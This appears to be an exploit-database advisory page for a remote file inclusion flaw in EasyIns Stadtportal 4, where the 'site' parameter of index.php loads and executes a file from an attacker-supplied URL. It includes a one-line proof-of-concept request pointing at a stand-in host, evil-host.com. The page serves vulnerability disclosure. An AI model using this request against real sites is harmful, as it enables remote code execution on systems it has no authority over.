header-logo
Suggest Exploit
vendor:
Stadtportal
by:
9
CVSS
CRITICAL
Arbitrary Code Execution
94
CWE
Product Name: Stadtportal
Affected Version From: 4
Affected Version To:
Patch Exists: NO
Related CWE:
CPE: a:easyins:stadtportal:4
Metasploit:
Other Scripts:
Platforms Tested:

Arbitrary Code Execution in EasyIns Stadtportal

The vulnerability allows an attacker to include malicious files containing arbitrary code to be executed on a vulnerable computer. By manipulating the 'site' parameter in the 'index.php' file, the attacker can provide a URL to a malicious file hosted on their server, which will then be executed on the target system.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of EasyIns Stadtportal.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/10795/info

EasyIns Stadtportal is reported prone to a vulnerability that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable computer.

EasyIns Stadtportal version 4 is reported prone to this issue. Other versions may be affected as well.

http://www.example.com/stadtportal-path/index.php?site=http://www.evil-host.com

Navigation

Suggest Exploit

Services By CQR